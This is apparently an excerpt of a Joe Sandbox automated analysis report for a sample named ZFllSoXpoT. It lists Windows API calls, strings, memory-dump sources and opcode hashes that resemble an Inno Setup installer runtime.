                                                                            • Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                            • Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
                                                                            APIs
                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                            • API String ID: 588496660-1846899949
                                                                            • Opcode ID: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                            • Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
                                                                            • Opcode Fuzzy Hash: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                            • Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
                                                                            Strings
                                                                            • Need to restart Windows? %s, xrefs: 0046C172
                                                                            • NextButtonClick, xrefs: 0046BF84
                                                                            • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                            • API String ID: 0-2329492092
                                                                            • Opcode ID: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                            • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                                            • Opcode Fuzzy Hash: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                            • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                                            APIs
                                                                            • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveChangeNotifyWindow
                                                                            • String ID: $Need to restart Windows? %s
                                                                            • API String ID: 1160245247-4200181552
                                                                            • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                            • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                                            • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                            • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                                            APIs
                                                                              • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                            • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                            • String ID: Creating directory: %s
                                                                            • API String ID: 2451617938-483064649
                                                                            • Opcode ID: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                            • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                                            • Opcode Fuzzy Hash: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                            • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressByteCharMultiProcWide
                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                            • API String ID: 2508298434-591603554
                                                                            • Opcode ID: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                            • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                                            • Opcode Fuzzy Hash: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                            • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                                            APIs
                                                                            • 7427A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                                            • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                                            • 7427A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 7427$A480A570ObjectSelect
                                                                            • String ID: k H
                                                                            • API String ID: 1310593387-1447039187
                                                                            • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                            • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                                            • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                            • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                            • String ID: k H
                                                                            • API String ID: 65125430-1447039187
                                                                            • Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                            • Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
                                                                            • Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                            • Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
                                                                            APIs
                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                              • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                              • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                            • API String ID: 395431579-1506664499
                                                                            • Opcode ID: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                            • Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
                                                                            • Opcode Fuzzy Hash: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                            • Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
                                                                            Strings
                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
                                                                            • PendingFileRenameOperations, xrefs: 00455A2C
                                                                            • PendingFileRenameOperations2, xrefs: 00455A3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                            • API String ID: 47109696-2115312317
                                                                            • Opcode ID: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                            • Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
                                                                            • Opcode Fuzzy Hash: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                            • Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
                                                                            APIs
                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                                            • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileNext
                                                                            • String ID:
                                                                            • API String ID: 2066263336-0
                                                                            • Opcode ID: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                            • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                                            • Opcode Fuzzy Hash: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                            • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                                            APIs
                                                                            • GetMenu.USER32(00000000), ref: 00421371
                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Menu
                                                                            • String ID:
                                                                            • API String ID: 3711407533-0
                                                                            • Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                            • Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
                                                                            • Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                            • Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
                                                                            APIs
                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                            • String ID:
                                                                            • API String ID: 601730667-0
                                                                            • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                            • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                            • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                            • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                            APIs
                                                                            • 7427A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                            • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                            • 74284620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                            • 7427A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 7427$74284620A480A570EnumFonts
                                                                            • String ID:
                                                                            • API String ID: 1607048897-0
                                                                            • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                            • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                            • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                            • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                            APIs
                                                                              • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                                            Strings
                                                                            • NumRecs range exceeded, xrefs: 0045C6FA
                                                                            • EndOffset range exceeded, xrefs: 0045C731
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: File$BuffersFlush
                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                            • API String ID: 3593489403-659731555
                                                                            • Opcode ID: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                            • Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
                                                                            • Opcode Fuzzy Hash: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                            • Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
                                                                            APIs
                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                              • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                              • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                              • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                              • Part of subcall function 00409B88: 6FDA1CD0.COMCTL32(0049859A), ref: 00409B88
                                                                              • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                              • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
                                                                              • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                              • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                              • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
                                                                              • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                              • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                              • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                              • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                              • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                              • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                              • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                              • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                              • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                              • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                              • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
